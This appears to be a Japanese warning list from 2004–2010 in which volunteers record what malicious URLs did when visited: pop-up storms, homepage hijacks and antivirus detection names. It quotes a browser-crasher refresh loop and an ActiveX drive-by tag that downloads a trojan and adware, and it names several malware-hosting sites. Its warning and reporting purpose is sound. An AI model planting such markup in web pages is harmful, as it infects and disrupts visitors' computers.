通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2008/09/19] | ウィルス名:TROJ_FAKEAV.FP |
[2005/08/15] | バスターでウィルス名:JS_SPAWN.Aを検出。ノートンでも反応するらしい。
「crashme」のニコチャンマークのウィンドウがディスクトップ内をうろつき回る。それを閉じると分裂して増えていく。 |
[2005/08/10] | ニュースストーム。 |
[2005/09/03] | ブラクラ。勝手にOutlookにニュースグループを300以上新しく作ってくる。 |
[2005/09/14] | 再確認。404。「ページを表示できません」となる。 |
[2005/08/10] | 無限ループ。 |
[2005/08/10] | ソースストーム。 |
[2009/12/02] | 無限アラート。これ が何度閉じても表示する。
タスクの強制終了で脱出可。 |
[2009/12/02] | 他の方の結果は以下の「」内。
「ブラクラでウイルス検出です。 ウイルス名はJS.WindowBomb、2000年に登場した古いものです。 影響はブラウザのウインドを多量に開くというものでブラクラの一種ですね。 マカフィーが反応したということでしたら普通は自動的に処理してるんじゃないですか? 2000年以前の状態のマカフィーをお使いでしたら問題かもしれませんが・・・(笑 」 |
[2007/01/06] | ウィルス名:TROJ_Generic.Z |
[2004/06/18] | //bubalom.by.ru/luisa/gallery1.html に飛ぶ。 |
[2004/06/21] | ウィルス名:MHTMLRedir.Exploit 。
変なツールバーがインストールされる。メディアプレーヤーが立ち上がらない。 IEのスタートページが何度直しても勝手に //www.coolsearch.biz/ に変わる。 よくわからない英語の画面が出る。(次の3つから選べよみたいな雰囲気の画面) 勝手にIEが立ち上がる。 デスクトップにアイコンが1つ増え、クリックしたらカジノのサイト?につながる。 |
[2004/06/23] | タスクマネージャー出なくなる。ホットゾヌやギコナビでスレの回覧出来なる。
ホームページが改変されて元に戻しても戻らなくなる。 ウィルス名:JAVA_BYTEVER.A+HTML_REDIR.A 他多数。 窓を閉じようとすると notepad.exe が上書きされようとする。 上書きされたnotepad,exe wmplayer.exe が外部から以下のウイルスを落とす。 HTML_LAMEDON.A + TROJ_MUSS.A メモ帳やWMPを起動しようとすると偽者の notepad,exe wmplayer.exe コンビが再度ウイルスを落としてくるためウイルス駆除してもキリがなく、しかも notepad,exe wmplayer.exe にはバスター反応せず。
|
[2004/06/28] | デスクトップの画像がおかしくなる。 HDDがガリガリ言い出し、トレンドマイクロのオンラインスキャンをしようとするとブラウザが落ちる。
そこでノートンのスキャンやパンダのスキャンをやってみると多くのウイルスが出て削除後、ノートンでインスト、アップデートして設定を自動起動にしたが自動起動しない。それにスキャンしても見つからない。 タスクマネージャを見るとPC起動してからやたら svchost が大量にでてきて、ページファイル使用量が一杯になり、HDDがガリガリいい続けて動作が遅くなる。 |
[2004/06/28] | 踏むとフレームタグで //talk.to/hosomichi/domain-names-V3/domain-names.html と //bubalom.by.ru/luisa/gallery1.html を表示する。
その後も別窓攻撃が多数来る。逃げ窓やアラート出しやらで気を紛らわせて、最終的に gallery1 は噂の hp.exe をDLさせようとしてくる。 |
[2004/07/05] | スタートページが //ynwngr.outhost.info/ になる。 |
[2004/07/05] | ディスクトップ画面が「 warnning!!you are in denger! 」(背景真っ黒)を表示する。
その場合の対処法は、
|
[2004/08/15] | ウィルス名:HTML_REDIR.A+JS_DIALOGARG.A+JAVA_BYTEVER.A |
[2005/01/23] | 踏むとポプアプ1つ。//bubalom.by.ru/luisa/gallery1.html を読みに行っているがスクリプトエラーが発生。
「外道の細道」なるサイトだがアダルトサイトのよう。 右クリック押すだけで//www.otsos.ru/cgi-bin/gc3/in.cgi?baas844&1 を別窓表示。元の //talk.to/hosomichi を閉じると別窓表示あり。 |
[2005/03/16] | //bubalom.by.ru/luisa/gallery1.html を読みに行っているが、ここが無害になっており、結局 //talk.to/hosomichi も無害。
ただし、右クリック新窓表示は生きており、注意。 //bubalom.by.ru/luisa/gallery1.html のURL解説も参照。 |
[2006/03/29] | 他の方の結果では「以前はウィルス反応があったサイトがフレームタグにて貼ってあります。何度か踏んでみましたが、たまに SpySpotterweb.exe という偽装アンチスパイウェアをDLさせようとしてきます。(当環境ではウィルスは検出しませんでした)」 |
[2006/09/03] | こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「cyber.wmf」は以下のURLから来ている。 //cyber-search.biz/cyber.wmf 元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。 |
[2005/09/09] | 無限ウインドウオープン。小窓逃げまくりなブラクラ。 |
[2005/04/05] | ソースが一部 暗号化されたページでウィルス名:JAVA_BYTEVER.A-1を検出。
しかし、2回目以降の確認では何度確認してもウィルス未検出の真っ白なページ。 |
[2005/04/05] | 踏むと このセキュリティ警告 が出る。そして、ウィルス名:JAVA_BYTEVER.A-1を検出。
セキュリティ警告の「いいえ」を選ぶと この小窓 を表示。小窓の「OK」を押すと再びセキュリティ警告。 ソースを見るとIFRAMEタグで//69.50.182.94/connect.cgi?id=33を呼び出しているので、これのURL解説も参照。 |
[2004/02/17] | FRAMEタグを用いたブラクラ。 |
[2006/04/18] | 踏むと こんな感じ になり、延々とリロードする。
ツールバーの「中止」ボタンか、ウィンドウ自体を閉じればそれで終わる。 ソースは以下である。 <html> <head> <meta http-equiv="refresh" content="0"> </head> <body> <iframe height=500 width=500 src="http://--------------------"> </iframe> </body> </html> つまり、IFRAMEタグを使い、以下の @ のURLを表示させ、それを延々と0秒後にリフレッシュ表示させる、というものである。 http://-------------------- ← @ @ のURLは当然存在しないURLである。 |
[2009/06/01] | ファイルサイズ:8.50 KB 。ウィルス名:TSPY_LDPINCH.BZU |
[2009/06/01] | ファイルサイズ:20.0 KB 。ウィルス名:TROJ_CUTWAIL.FR |
[2009/06/01] | ファイルサイズ:29.5 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。 |
[2009/06/01] | ファイルサイズ:10.0 KB 。ウィルス名:TROJ_GENERIC.DIT |
[2006/01/30] | WinFixer2005関連のページに飛んで、何かをインストールするよう催促され、同時にウィルス名:ADW_WINFIXER.F を検出。
WinFixer はインチキスパイウェア駆除ソフトである。 |
[2008/11/14] | ウイルス名:CRYP_UPACK |
[2008/10/06] | 2重拡張子。ウィルス名:TROJ_AGENT.AFSC |
[2005/08/15] | 踏むと こんな感じ のサイト。バスターがウィルス名:TROJ_ISTBAR.FSを検出すると同時に このダイアログ を表示。拒否すると何も無し。
ソースを見ると以下のスクリプトがある。スクリプトの中にあるURLはウィルスファイルである。 <OBJECT ID="dyfucadi" WIDTH=0 HEIGHT=0 CLASSID="clsid:E8EDB60C-951E-4130-93DC-FAF1AD25F8E7" CODEBASE="http://cdn.climaxbucks.com/mt/dialers/fc/UniDistIO.CAB#version=1,0,0,6"> <PARAM NAME="DownloadURL" VALUE="http://cdn.climaxbucks.com/internet-optimizer/br/wsi13/optimize.exe"> </OBJECT> ↑ まず、CODEBASEのURLはトロイの木馬でウィルス名:TROJ_ISTBAR.FSを検出。これが//teen.elitecities.com/dvd2005/を踏んだ時に反応したと思われる。 このTROJ_ISTBAR.FSがPC内で発動するとPARAM VALUEのURLを落としてくる。これがウィルス名:ADW_DYFUCA.K。 |
[2005/08/28] | 改めて確認。404になっている。 |
[2005/10/29] | avast でトロイの木馬の反応があるらしい。 |
[2006/01/10] | 他の方の結果は以下の「」内。
「炉DVD販売サイトのようです。宣伝文とメールアドレスのみ。VB2005反応なし、当方の環境では無害、倫理的有害。」 「トロイの木馬型 TROJ_ISTBAR.FS が検出されました。」 「改めて踏んでみましたが、当方の環境では特に反応はありませんでした。トレンドマイクロに書かれた症状なども見あたらないようです。」 「ActiveXコントロールで、Trojan.Downloader.Dyfuca.EI (BitDefender) をダウンロードさせようとする。」 |
[2005/09/03] | アダルトサイトだが、少し経つと色々なアダルトサイトをいくつか別窓表示、ウィルスを検出し始める。
他の方の鑑定でも「はじめの数秒は18禁アダルト画像ですが、ポップアップで次々と別のウイルスが送られてきます」とのこと。 ウィルス名:TROJ_DLOADER.XH+JS_PSYME.AF+EXPL_IFRAMEBO.A+JAVA_BYTEVER.A+JAVA_BYTEVER.A-1 URLが確認できた別窓は以下の2つ。他にも別窓はある。 //jama.lovinghost.com/test2/test2.html ← ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A //www.xexe.info/3/loader08.php ← ウィルス名:EXPL_IFRAMEBO.A |
[2005/10/01] | 再確認。海外サムネイルアダルトサイト。ウィルス名:TROJ_DLOADER.XH+JAVA_BYTEVER.A |
[2004/08/25] | スパイウェア:CoolWebSearch系。ウィルス名:JAVA_BYTEVER.A+JS_DIALOGARG.A |
[2004/09/24] | ウィルス名:JAVA_BYTEVER.A |
[2006/01/03] | 他の方の結果 →「ウイルス反応あり。Trojan-Downloader.JS.IstBar.x Trojan-Downloader.JS.IstBar.ai 検出。」 |
[2006/01/04] | McAfeeで Exploit-WMF を検出するらしい。 |
[2005/09/03] | ウィルス名:JS_DLOADER.I |
[2005/09/10] | ウィルス名:JS_DLOADER.I |
[2004/10/26] | 環境によりホームページ改変、ウィルス検出、消すとブックマーク登録しようとしてくる。 |
[2005/08/22] | 環境により、ダイヤラーが落ちてくる。 |
[2005/09/02] | 海外アダルトサイト。ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
[2005/09/02] | 海外アダルトサイト。ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
[2005/12/14] | 再確認。踏むと//24-7-search.com/poc/sp4.htmlに飛び、ウィルス名:JS_IFRAMEBO.E+JS_WINDEXP.A+JS_ONLOADXPLT.Aを検出。
詳細は//24-7-search.com/poc/sp4.htmlのURL List解説を参照。 |
[2005/12/10] | 海外アダルトサイト。このページ自体は無害と思われるが、サムネイル画像をクリックすると、ブラクラ並に色々な海外アダルトサイトが開く時がある。閉じても閉じてもどんどん開いていく。
ブラクラ状態の時によく見ると、右下のほうに小さな真っ白のウィンドウが存在しているのが分かるが、その小さなウィンドウのタスクを強制終了しないと、ブラクラ状態からは脱出不可であった。 稀に、小さな真っ白のウィンドウが複数ある場合があったので注意。 その過程で、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。 |
[2005/06/15] | ランダムでウィルス憑きサイトに飛ぶ。ウィルスが検出された場合は以下。
ウィルス名:Bloodhound.Exploit.6+Downloader.Trojan [ノートン] ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A+JAVA_BYTEVER.C [ウィルスバスター] |
[2005/04/09] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.Cを検出するが、何回か確認すると このURLで表示されるページが違う。ウィルス付きだったり、ウィルス無しだったり、閉じると別窓表示だったりする。 |
[2005/06/15] | ランダムでウィルス憑きサイトに飛ぶ。ウィルスが検出された場合は以下。
ウィルス名:Bloodhound.Exploit.6+Downloader.Trojan [ノートン] ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A+JAVA_BYTEVER.C [ウィルスバスター] |
[2004/10/07] | ウィルス名:JAVA_BYTEVER.A |
[2005/06/20] | 再確認。海外アダルトサイトのようだが、画像が全部リンク切れ。ウィルスも未検出。 |
[2005/07/01] | ウィルス名:JAVA_BYTEVER.A |
[2006/01/12] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y 。「as.wmf」をDLしろ、と言ってくる。
ソースを見ると、Location ヘッダで、以下の @ に飛び、更に A に飛ぶ。 @、//1800-search.com/closed.php A、//1800-search.com/as.wmf |
[2005/01/20] | 踏むとHDDが暫くの間唸り、ウィルス名:EXPL_IFRAMEBO.Aを検出。
その間、次々とエロサイトがブラクラ並に開きだし、ウィルス名:JAVA_BYTEVER.Aを複数検出、が2回。。 ある一定秒ごとに新窓が開いて、[ [ [ X O X O T A S G O S T O S A S ] ] ]という名前でお気に入りに登録しろ、と連発する。 また、ホームページを'http://www.xotas.net/'に設定しますか? ←これも連発。 |
[2005/02/01] | 踏むと//www.menservers.com/404.phpに飛び、警告窓で
「インターネットサイト http://www.menservers.com/404.phpを開けません。アクセスが拒否されました。」と出る。 そしてウィルス名:EXPL_IFRAMEBO.Aを検出。更に別窓で//www.casinomermaid.com/ja/index.html(カジノサイト)を表示。 バスターのウィルス検出窓を閉じると別窓が2枚。これらの別窓3つは閉じると更に別サイトを新窓表示する。 元の飛び先の//www.menservers.com/404.phpを閉じるとHDDが唸り出し、//www.teens-7000.com/?z=1の洋サムネイルエロサイトを表示するも再びウィルス名:EXPL_IFRAMEBO.Aを検出。 |
[2005/04/04] | エロサイトだがウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1を検出。
ノートンだとウィルス名:Bloodhound.Exploit.6を検出。 閉じると「TARGET SEARCH」なる検索ページをしつこく表示しようとする。 |
[2005/04/20] | 他の方の鑑定結果では、ウィルス名:JAVA_BYTEVER+PE_BUBE.A-O。その他アンチドートで5つほどウイルス反応あり。 |
[2006/06/01] | 日本語のアダルトサイト。いくつか挙動がある。それは以下。
|
[2006/06/01] | 他の方の結果は以下の「」内。
「ここにアクセスするとノートンが立ち上がって4つほどウィルスを検出します。telnetも立ち上がりさらにoutlookも立ち上がり色々悪さをします。」 |
[2006/06/01] | 「cyberを拾います。exploit(トロイ)ですのでノートンのオートで対応できていれば大丈夫かと思います。あとは一時フォルダ内をきれいにしてください。」 |
[2005/08/03] | FDDアタック。無限ループ。 |
[2005/08/03] | ウィルス名:JS_DOWNLOAD.D+JS_PSYME.AF
ブラクラ並みに色々なアダルトサイトが開く。ソースを見ると、下のようになっている。 IFRAMEタグで 1. 〜 3. を呼び出し。JavaScriptで 4. 〜 9. を呼び出し。window.openで 10. を呼び出す。
|
[2005/08/03] | 「ノートンでウィルス名:Bloodhound.Exploit.6 を検出。以下の行動をします。(シマンテックからの引用)
Backdoor.Nibu (別名Bloodhound.Exploit.6)は、バックドアを開き、キーロガーを実行し、個人情報を盗み出そうとするマルチスレッド実行型のトロイの木馬です。」 |
[2005/08/09] | 複数のIFRAMEタグ+javascriptで環境により最低5個所のPC有害サーバーに接続する。 |
[2005/08/09] | 他の方の環境だと、
|
[2006/08/22] | ウィルス名:TROJ_BUNCH.A |
[2008/11/14] | ウィルス名:TROJ_SHEUR.DK |
[2005/04/09] | ウィルス名:JAVA_BYTEVER.A |
[2005/07/14] | ウィルス名:HTML_MHTREDIR.AP
ソースを見るとIFRAMEタグで //highconvert.com/system/users/dimpy/ を読み込んでいるのが分かる。 |
[2004/10/28] | SPYBOT反応。exeのインスコダイアログも開く。閉じるとウインドオープン。 |
[2004/11/10] | ウィルス名:HTML_REDIR.A+JS_DIALOGARG.A |
[2007/05/12] | 海外アダルトサイト。確認した時はバスター無反応だったが、踏む時間帯やタイミングにより、反応すると思われる。 |
[2005/11/28] | ウィルス名:PERL_SUB7.G22.C+PERL_SUB7.G22.D |
[2005/11/28] | ウィルス名:TROJ_THEEFDL.A |
[2005/11/28] | ウィルス名:BKDR_DELF.AS+BKDR_DELF.AV+HKTL_EESCAN.A |
[2005/11/28] | ウィルス名:BKDR_AFG.A |
[2007/01/05] | ウィルス名:TSPY_BANCOS.GEN |
[2008/10/11] | ウィルス名:TROJ_SHEUR.BTE |
[2008/10/11] | ウィルス名:PAK_GENERIC.001 |
[2008/11/22] | 2008/10/19 にトレンドマイクロ社にファイルを提出。
2008/11/21 にその結果の連絡があり、ウィルス名:BKDR_NAELC.RHB として検出するよう対応、とのこと。 2008/10/19 にDLしたファイルからウィルス名:BKDR_NAELC.RHB を検出することを確認。 しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。 |
[2008/10/11] | ウィルス名:PAK_GENERIC.001 |
[2006/01/20] | 踏むと こんな感じ のサイトだが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php |
[2009/08/04] | ファイルサイズ:82.5 KB 。Windows Defender が TrojanDownloader:Win32/Renos.JA を検出。 |
[2006/06/23] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC+EXPL_WMF.GEN+TROJ_NASCENE.Y
この 小窓 付きで、真っ白なページだが、中央やや左で「何か」を呼び出している形跡がある。 FRAMEタグで、//countbest.net/adv/135/new.php を呼び出している。また、「xpl.wmf」ファイルもDLしろ、と言ってくる。 |
[2008/08/29] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF |
[2006/04/25] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC |
[2005/03/07] | ウィルス名:TROJ_REVOP.F |
[2005/03/07] | ウィルス名:SPYW_AGENT.A |
[2005/03/07] | ウィルス名:TROJ_REVOP.F |
[2010/04/15] | こんな感じ のサイトだが、ウィルス名:JS_GUMBLAR.SMNY を検出。 |
[2005/09/11] | ウィルス名:TROJ_DLOADER.XH+JAVA_BYTEVER.A |
[2006/04/25] | 他の方の結果では「MS06-001 WMF Exploitを検出。zipファイルのダウンロードページ等ではありません。」 |
[2005/08/20] | ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
[2006/07/02] | 他の方の結果では「Kaspersky で Exploit.Win32.IMG-WMF.v 検出。IrfanView経由で何かを実行しようとします。」 |
[2005/08/04] | 〜/2161.jpgを確認。ウィルス名:JAVA_BYTEVER.A |
[2005/08/28] | 〜/2161.jpgを再確認。jpg画像では無く、海外アダルトリンクページのよう。
ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.Aを検出。 |
[2005/10/22] | ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A
他の方の結果では「Fセキュアにてウィルス検知。外国製エロサイトのようです。」 |
[2005/10/30] | 〜/2161.jpgを確認。「ノートンではウィルス名:Bloodhound.Exploit.6を検出。」 |
[2005/12/05] | 〜/2161.jpgを踏まれた他の方の結果は以下の「」内。
「踏んでみたところ、ブラウザが応答しなくなりました。Bloodhoundウィルスも検出。」 |
[2005/12/07] | 〜/2161.jpgを鑑定した方のレスでは、環境により、Firefoxでも応答不能になるらしい。 |
[2005/12/10] | 「ウィルスサイトに飛びます。CPU使用率が100%になってIEが落ちました。」 |
[2005/12/27] | 以下は 〜/pages/2161.jpg を鑑定された方のレス。
「結構頻出のウイルスサイトですが以前とは挙動が違う模様。 ノートンで検出したウイルスはBloodhound.Exploit.54、Download.Trojan スクリプトプロンプトが開きCPU使用率100%になったところで、IEが固まりました。」 |
[2005/12/28] | 〜/pages/2166.jpg を踏まれた方の結果では、
「洋エロリンクサイト飛びました。ファイヤーウォールが何者かの攻撃を遮断しました。」 |
[2005/12/29] | 〜/pages/2161.jpg を踏まれた方の結果では、
「Kaspersky Anti-Virusでのウイルス検出名:Exploit.JS.CVE-2005-1790.a 、Exploit.JS.CVE-2005-1790.b 」 |
[2006/01/07] | 「ウィルス名:Exploit.Win32.IMG-WMF 検出。IrfanViewが起動させられます。
wmfのUpdateを当てれない環境で IrfanView などを使っている場合、アウトの可能性あります。」 |
[2006/01/13] | /pages/2161.wmv を確認。「22.wmf」をDLしろ、と言ってくるが、バスター反応。
ウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN |
[2006/01/14] | 〜/pages/2161.wmv の2ch鑑定結果は以下。
「MS06-001 WMF Exploitというウイルス(avast!) 。Exploit .MS05-053-WMF(ewidoではこんな名前) 」 |
[2006/01/17] | 〜/pages/2162.jpgを鑑定した方の結果は以下の「」内。
「VB2005反応あり、有害です。ウィルス名:TROJ_NASCENE.Y 。ちなみに、Live2chのプレビューですとEXPL_WMF.GEN(例の脆弱性)を検出。」 |
[2006/01/24] | 〜/2161.jpgの他の方の結果では、
「Exploit.Win32.IMG-WMF 検出。IrfanViewが起動させられます。 wmfのUpdateを当てていない環境で、アンチウイルスなどもインストールしていないのであれば、トロイやアドウェア、スパイウェアなどをインストールされたりするはずです。」 |
[2006/01/24] | 〜/2161.jpgを再確認。IE直踏みでは、ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。
ギコナビのプレビュー表示では、ウィルス名:EXPL_WMF.GEN のみを検出。 //1800-search.com/22.wmf をDLしろ、と催促される。 |
[2006/06/24] | 〜/2161.jpgの他の方の結果では、 「MS06-001 WMF Exploit というウイルスを送ってくるサイトが開きます。画像ではありません。さらにポップアップで得体の知れないアダルトサイトが開きます。」 |
[2006/06/26] | 「そこのページはPC無害でしたが、ひとつ上のディレクトリに行ってみたら AVG がウィルス検知しました。行かないほうが良いでしょう。」 |
[2006/07/28] | 「MS06-001 WMF Exploit を検出。さらに海外のアダルトサイトがポップアップで開きます。」 |
[2008/12/30] | ウィルス名:TROJ_BANLOAD.NIS |
[2007/04/21] | ウィルス名:TROJ_GENERIC |
[2007/04/21] | ウィルス名:TROJ_BANLOAD.BIK |
[2004/06/06] | 有限mailtoストーム。14個のmailtoウィンドウが出る。 |
[2005/11/07] | 無限ウィンドウオープン。 |
[2005/09/02] | DL+解凍すると「tenkuu_xp」というフォルダにexeとそれに付随するファイルがいくつか入っている。
exeには「W32/Backdoor.AXW」というマルウェアが含まれている。 |
[2005/01/24] | 踏むと別窓//www.kracotka.com/付きの//bbs.fozya.com/guestbook/guestbook.shtmlに飛び、ウィルス名:JAVA_BYTEVER.Aを検出。 閉じると次々とエロランキングサイトが開く。 |
[2005/02/05] | ロシア語の掲示板。少し挙動がおかしい。
何もないのにJAVAが起動したり、ページを閉じるとポップアップウィンドウが表示されたりする。 |
[2005/03/31] | //bbs.fozya.com/guestbook/guestbook.shtmlに飛ぶ。暫らく待っているとウィルス名:JAVA_BYTEVER.Aを検出。
別窓で//uxi.ru/top/?id=1478を表示しようとするが「ページを表示できません」となる。 |
[2005/04/09] | //bbs.fozya.com/guestbook/guestbook.shtmlに飛び、ウィルス名:TROJ_ANICMOO.D+JAVA_BYTEVER.A+JAVA_BYTEVER.Cを検出。
他の方の鑑定ではウィルス名:JS_IFRAMEBO.A+HTML_MHTREDIR.AWを検出するらしい。 |
[2005/07/21] | //bbs.fozya.com/guestbook/guestbook.shtmlに飛ぶ。 |
[2005/08/03] | 環境により、ウィルス名:DIAL_MAXD.Aを検出するらしい。 |
[2006/01/19] | 再確認。以下のURLに飛ぶが、今のところ無害化されており、実質無害。ただし、油断ならず。
//bbs.fozya.com/guestbook/guestbook.shtml 他の方の結果は以下の「」内。 「当環境ではウィルス反応はありませんが、環境によってはウィルス&スパイウェアを仕込まれるかもです。」 |
[2006/06/26] | 「FREE BBS「//bbs.fozya.com/guestbook/guestbook.shtml」に飛ばされます。
文字から察するにロシアのサイトに飛ばされます。 あと、ポップアップで「VIOLENT SHOW - TOP of FREE RAPE SITES voted by net surfers」というページが開きます。 アダルトサイトなのかグロサイトなのかはちょっとわかりません。当環境ではウイルス反応なし。」 |
[2006/06/26] | 「FREE BBSという海外のロリ系の掲示板に飛びます。ポップアップでいくつかアダルトサイトが開きます。このサイト自体にウイルスはありませんでしたがポップアップで開くサイトの中に、危険サイトが含まれている可能性が高いので注意です。」 |
[2004/07/11] | //adult-traffic.org/test/advert/console.php?adv=zRYlQI
//www.otsos.ru/cgi-bin/gc3/in.cgi?baas844&1 //www.otsos.ru/index2.htm に順次飛ぶ。 |
[2005/02/24] | //wonderful.at/2ch に飛ぶ。 |
[2004/07/11] | スパイウェア:CoolWebSearch系。//213.159.117.132/index.php に飛ぶ。 |
[2004/07/11] | //213.159.117.131/dl/ms.php に飛ぶ。 |
[2004/07/11] | mailtoストーム。最終的には //www.angelfire.com/hiphop2/rupantitle/r3/R3_temp.swfinputStr=2EF53A187E に飛ぶ。 |
[2004/07/11] | ニュースストーム、Telnetストーム。
//akausagi.com/tensai/ayasii/cgi-bin/ahya.cgiに飛ぶ。 |
[2004/07/11] | mailtoストーム。//216.120.237.78/~unyuuho/gungho/に飛ぶ。 |
[2004/08/29] | //60pictures.com/?id=smashingthumbs.comに飛ぶ。 |
[2005/02/12] | 最終的には //www2.strangeworld.org/uedakana/sahra1354.htm に飛ぶ。 |
[2004/07/26] | //unicyclist.com/tinyurl/redirect.php?num=4zxddに飛び、更に//www.geocities.jp/kazu1994_jp/bura.htmlに飛ぶ。 |
[2004/08/29] | //unicyclist.com/tinyurl/redirect.php?num=595zに飛び、更に//www.albinoblacksheep.com/flash/open.htmlに飛ぶ。 |
[2004/12/19] | SPYBOT反応:DoubleClick。繰り返し反応する。 |
[2005/12/31] | ウィルス名:TROJ_WMFCRASH.A 。//kikuz0u.x0.com/wmf_exp.htmlに飛ぶ。 |
[2005/12/31] | 他の方の結果は以下の「」内。
「ウイルス Exploit-WMF を検出。今回見つかったWindowsのセキュリティホール狙ったモノです。下記を参照にどうぞ。
http://amatanoyo.blog16.fc2.com/blog-entry-132.html 」 |
[2005/11/30] | 下のURLに飛ばされ、IPを抜かれる。いわゆる「厨房ホイホイ」。
//www.hellplant.org/cgi-bin/xoor/serpent.cgi |
[2005/04/28] | ウィルス名:JS_PSYME.AF。//www.googkle.com/に飛ぶ。 |
[2006/02/17] | Location ヘッダで //www.alexa69.com/?thumbs/53fc0f.jpg に飛ぶので、そちらのURL List解説を参照。
他の方の結果は以下の「」内。 「海外のウイルスつきエロサイトへ飛ばされます。avast!反応:MS06-001 WMF Exploit 」 「NOD32が TrojanDownloader.Ani.gen 、W32Exploit.WMF 、Java/ClassLoader.AA を検出。ノートンで反応有。」 |
[2004/05/24] | //www.raus.de/crashmeに飛ぶ。 |
[2005/09/10] | //tag.nobody.jp/news.htmlに飛ぶ。 |
[2005/09/21] | − 踏まれた方の結果を記載 −
踏むと こんな感じ でOutlookを開いてきます。 Outlookが入ってなかったらWordを開きまくってブラウザも落ちました。NISの反応有り。 |
[2005/06/22] | //vip.6to23.com/jpgman/gui/gui.htmに飛ぶ。 |
[2004/12/12] | //raus.de/crashmeに飛ぶ。 |
[2007/01/27] | Location ヘッダで //nexx.jp/crashme.html に飛ぶ。 |
[2007/01/15] | ウィルス名:TROJ_BUSKY.DP |
[2007/01/15] | 2007/01/08 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_BUSKY.DP として検出するよう対応、とのこと。 実際に 2007/01/08 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BUSKY.DP を検出することを確認。 2007/01/08 から今日まではファイルは置き換えられていないと推測される。 |
[2007/01/06] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1+JAVA_BYTEVER.K |
[2009/07/05] | ファイルサイズ:58.3 KB 。ウィルス名:CRYP_MANGLED |
[2009/07/05] | ファイルサイズ:56.5 KB 。バスター無反応だが、多くの他社製ウィルス駆除ソフトで反応がある。 |
[2008/07/27] | バナーを大量に出すブラクラサイトらしい。
行ってみると、確かにポップアップが次々と開くようなっているが、ポップアップ拒否していれば無問題と思われる。 しかし、このサイトにはバスターが危険なWebサイトとして警告する。 |
[2008/10/08] | 真っ白なページだが、ウィルス名:MAL_HIFRM+JS_OBFUS.CC+JS_DLOADR.VW を検出。
このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 また、このサイトは、IFRAMEタグを使って以下の複数のURLを呼び出している。 //www.eqw009.cn/b3.htm //www.hrz005.cn/b3.htm //www.pdh001.cn/b3.htm //www.union501.cn/b3.htm //www.wrmfwd.cn/b3.htm //www.wrmfwi.cn/b3.htm //www.wrmfwj.cn/b3.htm //www.wrmfwk.cn/b3.htm //www.wyf005.cn/b3.htm //www.wyf010.cn/b3.htm |
[2008/11/24] | 再確認。こんな感じ の中国系サイトだが、ウィルス名:MAL_HIFRM を検出。
しきりに様々なURLを呼び出そうとしている。 また、このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 ソースを見ると、IFRAMEタグを使って相当数のURLを呼び出している。 呼び出されているURLは無害のものもあれば、有害のものもあると思われる。 |
[2008/12/30] | 2重拡張子。ウィルス名:TROJ_AGENT.AFSC |
[2005/11/27] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → Trojan/PSW.Kapod.K.11 AVG Antivirus → PSW.Generic.EAY Dr.Web → Trojan.PWS.MailSnd Fortinet → W32/Kapod.K-pws Kaspersky Anti-Virus → Trojan-PSW.Win32.Kapod.k NOD32 → a variant of Win32/Tsipe VBA32 → Trojan-PSW.Win32.Kapod.k |
[2005/11/27] | 2chでの結果は以下の「」内。
「ウイルス(movie.exe)有り。飛び先で、動画リンクに見せかけたワンクリウイルスあります。実際にmovie.exeを実行したところワンクリ登録しますた、と出ました。」 |
[2004/11/14] | ウィルス名:VBS_REDLOF.A |
[2005/08/01] | 無限JavaScript。 |
[2004/03/18] | 「ブラウザクラッシャーウィンドウを大量に表示する。10回開くと止まります」らしいが無限に増殖する。 |
[2004/06/13] | 「獅子チャット」という所だが無限にジャンプする。 |
[2004/12/09] | 「W-I型地雷」というブラクラ。「あぼーん」と書かれた窓が無限に開き続ける。 |
[2005/09/23] | 携帯電話を狙ったスクリプトが仕組まれていたらしい。2chでのレスは以下。現在はページが無い模様。
「それ携帯で踏まない方が良いと思う。俺の携帯では強制的に電話帳の画面に切替えさせられてビビったよw」 「当方のDoCoMoとvodafone携帯でアクセスしてみました所、DoCoMoの方では異常は確認できませんでしたが、vodafoneの方ではページから抜け出せなくなりました。少し前に流行っていた、アクセスすると呪怨の着メロが流れて抜け出せなくページと同じ類の様ですね。」 |
